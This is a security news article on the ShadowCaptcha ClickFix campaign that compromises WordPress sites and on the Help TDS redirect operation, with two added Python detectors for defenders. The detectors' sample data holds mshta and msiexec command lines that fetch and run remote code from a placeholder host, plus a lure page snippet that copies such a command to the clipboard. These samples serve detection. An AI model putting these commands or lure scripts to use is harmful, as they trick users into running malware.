
ShadowCaptcha Exploits WordPress Websites to Spread Ransomware, Information Stealers, and Crypto Miners

A new large-scale campaign has been observed exploiting more than 100 compromised WordPress websites to direct site visitors to fake CAPTCHA verification pages that use the ClickFix social engineering tactic to deliver information stealers, ransomware, and cryptocurrency miners.

The campaign, first detected in August 2025, has been codenamed ShadowCaptcha by the Israel National Digital Agency (INCD).

"The campaign [...] blends social engineering, living-off-the-land binaries (LOLBins), and multi-stage payload delivery to gain and maintain a foothold in targeted systems," researchers Shimi Cohen, Adi Pick, Idan Beit Yosef, Hila David, and Yaniv Goldman said.

"The ultimate goals of ShadowCaptcha are collecting sensitive information through credential harvesting and browser data exfiltration, deploying cryptocurrency miners to generate illicit revenue, and even causing ransomware outbreaks."

The attacks begin with unsuspecting users visiting a compromised WordPress site into which malicious JavaScript has been injected. That script initiates a redirection chain that lands the visitor on a fake Cloudflare or Google CAPTCHA page.

From there, the attack chain forks in two, depending on the ClickFix instructions displayed on the page: one branch walks the victim through pasting a command into the Windows Run dialog, the other instructs them to save the page as an HTML Application (HTA) and then run it with mshta.exe.


The Run dialog branch ends in the deployment of the Lumma and Rhadamanthys stealers, either via MSI installers launched with msiexec.exe or via remotely hosted HTA files executed with mshta.exe. The saved-HTA branch instead installs Epsilon Red ransomware. In both cases the payload is launched by a signed Microsoft binary rather than by a dropped executable, which is why process-creation telemetry for mshta.exe and msiexec.exe, rather than file-based antivirus alone, is the natural detection point.
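Both branches end in mshta.exe or msiexec.exe fetching or running attacker-controlled content, so endpoint process-creation events are where a defender would look. The following Python is an added example, not code from the INCD report or from the campaign itself: it applies a few rules mirroring the two branches described above to constructed Sysmon-style events. The hostnames, file paths and user name in the sample events are placeholders, and the rule names are this example's own.

```python
import re

# Constructed process-creation events (not real telemetry). The field names
# follow Sysmon Event ID 1 / Windows 4688 records; "parent_image" is the
# creating process, which for a command typed into the Win+R Run dialog is
# explorer.exe.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://example.invalid/verify.hta",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec /i https://example.invalid/update.msi /qn",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" "C:\Users\alice\Downloads\verify.hta"',
     "parent_image": r"C:\Windows\explorer.exe"},
    # Benign: an administrator installs a package from an internal share.
    {"image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec /i \\fileserver\sw\7zip.msi /qn",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# An .hta launched from a user-writable folder where a browser "Save as" lands.
SAVED_HTA_RE = re.compile(r"\\(Downloads|Desktop|Temp|AppData)\\[^\"']*\.hta\b", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the rule names an event triggers, in a fixed order."""
    image = _basename(event["image"])
    cmd = event["command_line"]
    hits = []
    if image == "mshta.exe":
        if URL_RE.search(cmd):
            hits.append("mshta_remote_hta")      # Run-dialog branch, remote HTA
        if SAVED_HTA_RE.search(cmd):
            hits.append("mshta_saved_hta")       # save-as-HTA branch
    elif image == "msiexec.exe" and URL_RE.search(cmd):
        hits.append("msiexec_remote_msi")        # Run-dialog branch, MSI pulled from a URL
    # Context rather than a rule on its own: explorer.exe is the parent when
    # the user pastes the command into the Run dialog.
    if hits and _basename(event.get("parent_image", "")) == "explorer.exe":
        hits.append("parent_is_explorer")
    return hits


def scan(events):
    """Return (index, hits) for every event that trips at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["command_line"], "->", ", ".join(hits))
```

The local-share msiexec install and the notepad launch are deliberately left untouched: the rules key on a remote URL or a user-writable .hta path, not on the LOLBin name alone, which keeps ordinary software deployment out of the alert queue.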


The use of ClickFix lures to trick users into downloading malicious HTA files to spread Epsilon Red ransomware was documented last month by CloudSEK.

"The compromised ClickFix page automatically executes obfuscated JavaScript that uses 'navigator.clipboard.writeText' to copy a malicious command to the user's clipboard without any interaction, relying on users to paste and run it unknowingly," the researchers said.

The attacks also use anti-debugger techniques to hinder inspection of the pages with browser developer tools, and rely on DLL side-loading to execute malicious code under the guise of legitimate processes.

Select ShadowCaptcha campaigns have been observed delivering an XMRig-based cryptocurrency miner. Some variants fetch the mining configuration from a Pastebin URL rather than hard-coding it in the malware, which lets the operators change wallet, pool, or throttling parameters on the fly without redeploying the payload.

Where miner payloads are deployed, the attackers have also been observed dropping a vulnerable driver ("WinRing0x64.sys") to gain kernel-level access and interact with CPU registers in order to improve mining efficiency. WinRing0 is the same driver legitimate XMRig builds load for register tuning, so its appearance on a host that is not knowingly running a miner is a strong indicator on its own.


Most of the infected WordPress sites are located in Australia, Brazil, Italy, Canada, Colombia, and Israel, spanning the technology, hospitality, legal/finance, healthcare, and real estate sectors.

To mitigate the risks posed by ShadowCaptcha, it is essential to train users to recognise ClickFix lures, segment networks to limit lateral movement, and keep WordPress sites up to date and protected with multi-factor authentication (MFA). Because both infection branches depend on the victim launching mshta.exe (or msiexec.exe) by hand, restricting or at least alerting on those binaries through application control is a high-value complement to user training.

"ShadowCaptcha shows how social-engineering attacks have evolved into full-spectrum cyber operations," the researchers said. "By tricking users into running built-in Windows tools and layering obfuscated scripts and vulnerable drivers, operators gain stealthy persistence and can pivot between data theft, crypto mining, or ransomware."

The disclosure comes as GoDaddy detailed the evolution of Help TDS, a traffic distribution (or direction) system that has been active since 2017 and has been linked to malicious schemes such as VexTrio Viper. Help TDS provides partners and affiliates with PHP code templates that are injected into WordPress sites, ultimately routing visitors to malicious destinations based on targeting criteria.


"The operation focuses on tech support scams utilizing full-screen browser manipulation and exit prevention techniques to trap victims on fraudulent Microsoft Windows security alert pages, with fallback monetization through dating, cryptocurrency, and sweepstakes scams," security researcher Denis Sinegubko said.


Notable malware campaigns that have leveraged Help TDS in recent years include DollyWay, Balada Injector, and DNS TXT redirects. The scam pages use JavaScript to force the browser into full-screen mode while displaying the fraudulent alert, and some present a counterfeit CAPTCHA challenge before rendering the scam page in a bid to sidestep automated security scanners.
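The page-side tells for both campaigns on this page, the ClickFix clipboard hijack via navigator.clipboard.writeText paired with Run-dialog instructions, and the Help TDS full-screen forcing and exit prevention, are all present in the HTML and JavaScript the compromised site serves. The following Python is an added example, not code from the INCD or GoDaddy research: it scans page source for those indicators and combines them into a verdict so that a legitimate copy-to-clipboard button is not flagged. The three sample pages are constructed for this example, the anti-debugger pattern (a timed `debugger;` statement) is a common ClickFix trait the article only mentions generically, and the URL and command in the lure are placeholders rather than a real payload.

```python
import re

# Indicator patterns. The article names clipboard.writeText, fake Cloudflare /
# Google CAPTCHA lures, Run-dialog instructions, forced full screen and exit
# prevention; the anti-debugger and execCommand patterns are this example's
# own additions based on common ClickFix page behaviour.
INDICATORS = {
    "clipboard_write": re.compile(
        r"navigator\.clipboard\.writeText\s*\(|execCommand\(\s*['\"]copy['\"]", re.I),
    "run_dialog_instruction": re.compile(
        r"win(dows)?\s*(key)?\s*\+\s*R\b|\bCTRL\s*\+\s*V\b|Run\s+dialog", re.I),
    "captcha_lure": re.compile(
        r"verify\s+you\s+are\s+(a\s+)?human|I'?m\s+not\s+a\s+robot|Ray\s+ID|cf-turnstile|recaptcha",
        re.I),
    "fullscreen_force": re.compile(r"\.requestFullscreen\s*\(|webkitRequestFullscreen", re.I),
    "exit_prevention": re.compile(
        r"onbeforeunload|addEventListener\(\s*['\"]beforeunload['\"]|history\.pushState\s*\(", re.I),
    "anti_debugger": re.compile(r"\bdebugger\s*;|console\.clear\s*\(", re.I),
}


def scan_page(html):
    """Return the sorted list of indicator names found in a page's source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(html))


def verdict(html):
    """Combine indicators: one indicator alone is not enough to flag a page."""
    hits = set(scan_page(html))
    if "clipboard_write" in hits and hits & {"run_dialog_instruction", "captcha_lure"}:
        return "clickfix_lure"
    if {"fullscreen_force", "exit_prevention"} <= hits:
        return "tech_support_scam"
    if len(hits) >= 2:
        return "suspicious"
    return "clean"


# Constructed samples (not captured from any real site).
CLICKFIX_SAMPLE = """
<div class="cf-box"><h2>Verify you are human</h2>
<p>Press Windows Key + R, then CTRL + V and Enter to complete the verification.</p></div>
<script>
setInterval(function(){debugger;},200);
var c = "mshta https://example.invalid/verify.hta";
navigator.clipboard.writeText(c);
</script>
"""

HELP_TDS_SAMPLE = """
<h1>Microsoft Windows Security Alert</h1>
<p>Your computer has been locked. Call support now.</p>
<script>
document.documentElement.requestFullscreen();
window.onbeforeunload = function(){ return 'Do not close this window'; };
history.pushState(null, '', location.href);
</script>
"""

BENIGN_SAMPLE = """
<code id="k">sk_live_placeholder</code>
<button onclick="navigator.clipboard.writeText(document.getElementById('k').textContent)">Copy API key</button>
"""

if __name__ == "__main__":
    for label, page in [("clickfix", CLICKFIX_SAMPLE), ("help_tds", HELP_TDS_SAMPLE),
                        ("benign", BENIGN_SAMPLE)]:
        print(label, verdict(page), scan_page(page))
```

In practice this runs against the rendered DOM or the fetched response of each page on a site you own, since the injected JavaScript is frequently obfuscated or loaded from a third-party domain; a single regex pass over the raw HTML will miss a lure that only assembles the `writeText` call at runtime, so treat a "clean" result as absence of evidence rather than a clean bill of health.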

Help TDS operators are said to have developed a malicious WordPress plugin known as "woocommerce_inputs" between late 2024 and August 2025 to provide the redirection functionality, gradually adding credential harvesting, geographic filtering, and advanced evasion techniques. The plugin is estimated to be installed on more than 10,000 sites worldwide.

The malicious plugin masquerades as WooCommerce to evade detection by site owners. It is installed only after attackers have compromised a WordPress site through stolen administrator credentials, so it is a post-compromise component rather than an initial access vector. Site owners can spot it by reconciling the installed plugin list against what they actually deployed: the slug "woocommerce_inputs" is not part of the genuine WooCommerce plugin.

"This plugin serves as both a traffic monetization tool and credential harvesting mechanism, demonstrating continuous evolution from simple redirect functionality to a sophisticated malware-as-a-service offering," GoDaddy said.

"By providing ready-made solutions including C2 infrastructure, standardized PHP injection templates, and fully-featured malicious WordPress plugins, Help TDS has lowered the barrier to entry for cybercriminals looking to monetize infiltrated websites."
